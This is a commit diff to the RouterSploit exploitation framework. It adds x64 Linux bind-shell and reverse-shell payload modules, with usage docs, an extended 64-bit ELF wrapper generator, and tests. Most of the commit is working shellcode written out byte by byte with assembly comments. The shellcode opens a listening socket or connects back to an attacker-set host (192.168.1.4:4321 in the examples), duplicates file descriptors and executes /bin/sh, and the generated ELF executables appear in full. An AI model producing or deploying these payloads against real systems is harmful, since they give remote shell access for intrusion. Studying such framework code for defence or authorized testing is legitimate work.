Payloads x64 (#455)

lucyoa · web-flow · commit 4e77c24a59e8 · 2018-06-10T23:38:59.000+02:00
* Adding x64 payloads

* Fixing x64 bind and reverse payloads, adding tests and docs
diff --git a/docs/modules/payloads/x64/bind_tcp.md b/docs/modules/payloads/x64/bind_tcp.md
@@ -0,0 +1,31 @@
+## Description
+
+Module generates payload that creates interactive tcp bind shell for X64 architecture.
+
+## Verification Steps
+
+  1. Start `./rsf.py`
+  2. Do: `use payloads/x64/bind_tcp`
+  3. Do: `set rport 4321`
+  4. Do: `run`
+  5. Module generates x64 bind shell tcp payload
+
+## Scenarios
+
+```
+rsf > use payloads/x64/bind_tcp
+rsf (X64 Bind TCP) > set rport 4321
+[+] rport => 4321
+rsf (X64 Bind TCP) > run
+[*] Running module...
+[*] Generating payload
+[+] Building payload for python
+payload = (
+    "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
+    "\xc7\x04\x24\x02\x00\x10\xe1\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
+    "\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
+    "\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
+    "\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
+    "\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
+)
+```
diff --git a/docs/modules/payloads/x64/reverse_tcp.md b/docs/modules/payloads/x64/reverse_tcp.md
@@ -0,0 +1,32 @@
+## Description
+
+Module generates payload that creates interactive tcp reverse shell for X64 architecture.
+
+## Verification Steps
+
+  1. Start `./rsf.py`
+  2. Do: `use payloads/x64/reverse_tcp`
+  3. Do: `set lhost 192.168.1.4`
+  4. Do: `set lport 4321`
+  5. Module generates x64 reverse shell tcp payload
+
+## Scenarios
+
+```
+rsf > use payloads/x64/reverse_tcp
+rsf (X64 Reverse TCP) > set lhost 192.168.1.4
+[+] lhost => 192.168.1.4
+rsf (X64 Reverse TCP) > set lport 4321
+[+] lport => 4321
+rsf (X64 Reverse TCP) > run
+[*] Running module...
+[*] Generating payload
+[+] Building payload for python
+payload = (
+    "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
+    "\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
+    "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
+    "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
+    "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
+)
+```
diff --git a/routersploit/core/exploit/payloads.py b/routersploit/core/exploit/payloads.py
@@ -72,6 +72,16 @@
         b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08"
         b"\x00\x80\x04\x08\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
         b"\x00\x10\x00\x00"
+    ),
+    Architectures.X64: (
+        b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+        b"\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00\x00\x00"
+        b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+        b"\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00\x00\x00\x00\x00"
+        b"\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+        b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00"
+        b"\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42"
+        b"\x00\x10\x00\x00\x00\x00\x00\x00"
     )
 }
 
@@ -155,14 +165,25 @@ def run(self):
     def generate_elf(self, data):
         elf = self.header + data
 
-        if self.bigendian:
-            p_filesz = pack(">L", len(elf))
-            p_memsz = pack(">L", len(elf) + len(data))
-        else:
-            p_filesz = pack("<L", len(elf))
-            p_memsz = pack("<L", len(elf) + len(data))
+        if elf[4] == 1:  # ELFCLASS32 - 32 bit
+            if self.bigendian:
+                p_filesz = pack(">L", len(elf))
+                p_memsz = pack(">L", len(elf) + len(data))
+            else:
+                p_filesz = pack("<L", len(elf))
+                p_memsz = pack("<L", len(elf) + len(data))
+
+            content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
+        elif elf[4] == 2:  # ELFCLASS64 - 64 bit
+            if self.bigendian:
+                p_filesz = pack(">Q", len(elf))
+                p_memsz = pack(">Q", len(elf) + len(data))
+            else:
+                p_filesz = pack("<Q", len(elf))
+                p_memsz = pack("<Q", len(elf) + len(data))
+
+            content = elf[:0x60] + p_filesz + p_memsz + elf[0x70:]
 
-        content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
         return content
 
     @staticmethod
diff --git a/routersploit/modules/payloads/x64/__init__.py b/routersploit/modules/payloads/x64/__init__.py
diff --git a/routersploit/modules/payloads/x64/bind_tcp.py b/routersploit/modules/payloads/x64/bind_tcp.py
@@ -0,0 +1,69 @@
+from routersploit.core.exploit import *
+from routersploit.core.exploit.payloads import (
+    ArchitectureSpecificPayload,
+    Architectures,
+    BindTCPPayloadMixin,
+)
+
+
+class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
+    __info__ = {
+        "name": "X64 Bind TCP",
+        "description": "Creates interactive tcp bind shell for X64 architecture.",
+        "authors": (
+            "ricky",  # metasploit module
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        )
+    }
+
+    architecture = Architectures.X64
+
+    def generate(self):
+        bind_port = utils.convert_port(self.rport)
+
+        return (
+            b"\x6a\x29" +                      # pushq  $0x29
+            b"\x58" +                          # pop    %rax
+            b"\x99" +                          # cltd
+            b"\x6a\x02" +                      # pushq  $0x2
+            b"\x5f" +                          # pop    %rdi
+            b"\x6a\x01" +                      # pushq  $0x1
+            b"\x5e" +                          # pop    %rsi
+            b"\x0f\x05" +                      # syscall
+            b"\x48\x97" +                      # xchg   %rax,%rdi
+            b"\x52" +                          # push   %rdx
+            b"\xc7\x04\x24\x02\x00" +          # movl   $0xb3150002,(%rsp)
+            bind_port +                        # port
+            b"\x48\x89\xe6" +                  # mov    %rsp,%rsi
+            b"\x6a\x10" +                      # pushq  $0x10
+            b"\x5a" +                          # pop    %rdx
+            b"\x6a\x31" +                      # pushq  $0x31
+            b"\x58" +                          # pop    %rax
+            b"\x0f\x05" +                      # syscall
+            b"\x6a\x32" +                      # pushq  $0x32
+            b"\x58" +                          # pop    %rax
+            b"\x0f\x05" +                      # syscall
+            b"\x48\x31\xf6" +                  # xor    %rsi,%rsi
+            b"\x6a\x2b" +                      # pushq  $0x2b
+            b"\x58" +                          # pop    %rax
+            b"\x0f\x05" +                      # syscall
+            b"\x48\x97" +                      # xchg   %rax,%rdi
+            b"\x6a\x03" +                      # pushq  $0x3
+            b"\x5e" +                          # pop    %rsi
+            b"\x48\xff\xce" +                  # dec    %rsi
+            b"\x6a\x21" +                      # pushq  $0x21
+            b"\x58" +                          # pop    %rax
+            b"\x0f\x05" +                      # syscall
+            b"\x75\xf6" +                      # jne    33 <dup2_loop>
+            b"\x6a\x3b" +                      # pushq  $0x3b
+            b"\x58" +                          # pop    %rax
+            b"\x99" +                          # cltd
+            b"\x48\xbb\x2f\x62\x69\x6e\x2f" +  # movabs $0x68732f6e69622f,%rbx
+            b"\x73\x68\x00" +                  #
+            b"\x53" +                          # push   %rbx
+            b"\x48\x89\xe7" +                  # mov    %rsp,%rdi
+            b"\x52" +                          # push   %rdx
+            b"\x57" +                          # push   %rdi
+            b"\x48\x89\xe6" +                  # mov    %rsp,%rsi
+            b"\x0f\x05"                        # syscall
+        )
diff --git a/routersploit/modules/payloads/x64/reverse_tcp.py b/routersploit/modules/payloads/x64/reverse_tcp.py
@@ -0,0 +1,63 @@
+from routersploit.core.exploit import *
+from routersploit.core.exploit.payloads import (
+    ArchitectureSpecificPayload,
+    Architectures,
+    ReverseTCPPayloadMixin,
+)
+
+
+class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
+    __info__ = {
+        "name": "X64 Reverse TCP",
+        "description": "Creates interactive tcp reverse shell for X64 architecture.",
+        "authors": (
+            "ricky",  # metasploit module
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        )
+    }
+
+    architecture = Architectures.X64
+
+    def generate(self):
+        reverse_ip = utils.convert_ip(self.lhost)
+        reverse_port = utils.convert_port(self.lport)
+
+        return (
+            b"\x6a\x29" +                      # pushq  $0x29
+            b"\x58" +                          # pop    %rax
+            b"\x99" +                          # cltd
+            b"\x6a\x02" +                      # pushq  $0x2
+            b"\x5f" +                          # pop    %rdi
+            b"\x6a\x01" +                      # pushq  $0x1
+            b"\x5e" +                          # pop    %rsi
+            b"\x0f\x05" +                      # syscall
+            b"\x48\x97" +                      # xchg   %rax,%rdi
+            b"\x48\xb9\x02\x00" +              # movabs $0x100007fb3150002,%rcx
+            reverse_port +                     # port
+            reverse_ip +                       # ip
+            b"\x51" +                          # push   %rcx
+            b"\x48\x89\xe6" +                  # mov    %rsp,%rsi
+            b"\x6a\x10" +                      # pushq  $0x10
+            b"\x5a" +                          # pop    %rdx
+            b"\x6a\x2a" +                      # pushq  $0x2a
+            b"\x58" +                          # pop    %rax
+            b"\x0f\x05" +                      # syscall
+            b"\x6a\x03" +                      # pushq  $0x3
+            b"\x5e" +                          # pop    %rsi
+            b"\x48\xff\xce" +                  # dec    %rsi
+            b"\x6a\x21" +                      # pushq  $0x21
+            b"\x58" +                          # pop    %rax
+            b"\x0f\x05" +                      # syscall
+            b"\x75\xf6" +                      # jne    27 <dup2_loop>
+            b"\x6a\x3b" +                      # pushq  $0x3b
+            b"\x58" +                          # pop    %rax
+            b"\x99" +                          # cltd
+            b"\x48\xbb\x2f\x62\x69\x6e\x2f" +  # movabs $0x68732f6e69622f,%rbx
+            b"\x73\x68\x00" +                  #
+            b"\x53" +                          # push   %rbx
+            b"\x48\x89\xe7" +                  # mov    %rsp,%rdi
+            b"\x52" +                          # push   %rdx
+            b"\x57" +                          # push   %rdi
+            b"\x48\x89\xe6" +                  # mov    %rsp,%rsi
+            b"\x0f\x05"                        # syscall
+        )
diff --git a/tests/payloads/x64/__init__.py b/tests/payloads/x64/__init__.py
diff --git a/tests/payloads/x64/test_bind_tcp.py b/tests/payloads/x64/test_bind_tcp.py
@@ -0,0 +1,40 @@
+from routersploit.modules.payloads.x64.bind_tcp import Exploit
+
+
+# bind tcp payload with rport=4321
+bind_tcp = (
+    b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
+    b"\xc7\x04\x24\x02\x00\x10\xe1\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
+    b"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
+    b"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
+    b"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
+    b"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
+)
+
+# elf x64 bind tcp
+elf_x64_bind_tcp = (
+    b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
+    b"\x00\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00"
+    b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00"
+    b"\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
+    b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
+    b"\x40\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x24"
+    b"\x01\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
+    b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
+    b"\xc7\x04\x24\x02\x00\x10\xe1\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
+    b"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
+    b"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
+    b"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
+    b"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
+)
+
+
+def test_payload_generation():
+    """ Test scenario - payload generation """
+
+    payload = Exploit()
+    payload.rport = 4321
+
+    assert payload.generate() == bind_tcp
+    assert payload.generate_elf(bind_tcp) == elf_x64_bind_tcp
diff --git a/tests/payloads/x64/test_reverse_tcp.py b/tests/payloads/x64/test_reverse_tcp.py
@@ -0,0 +1,39 @@
+from routersploit.modules.payloads.x64.reverse_tcp import Exploit
+
+
+# reverse tcp with lhost=192.168.1.4  lport=4321
+reverse_tcp = (
+    b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
+    b"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
+    b"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
+    b"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
+    b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
+)
+
+# elf x64 reverse tcp
+elf_x64_reverse_tcp = (
+    b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
+    b"\x00\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00"
+    b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00"
+    b"\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
+    b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
+    b"\x40\x00\x00\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x0c"
+    b"\x01\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
+    b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
+    b"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
+    b"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
+    b"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
+    b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
+)
+
+
+def test_payload_generation():
+    """ Test scenario - payload generation """
+
+    payload = Exploit()
+    payload.lhost = "192.168.1.4"
+    payload.lport = 4321
+
+    assert payload.generate() == reverse_tcp
+    assert payload.generate_elf(reverse_tcp) == elf_x64_reverse_tcp
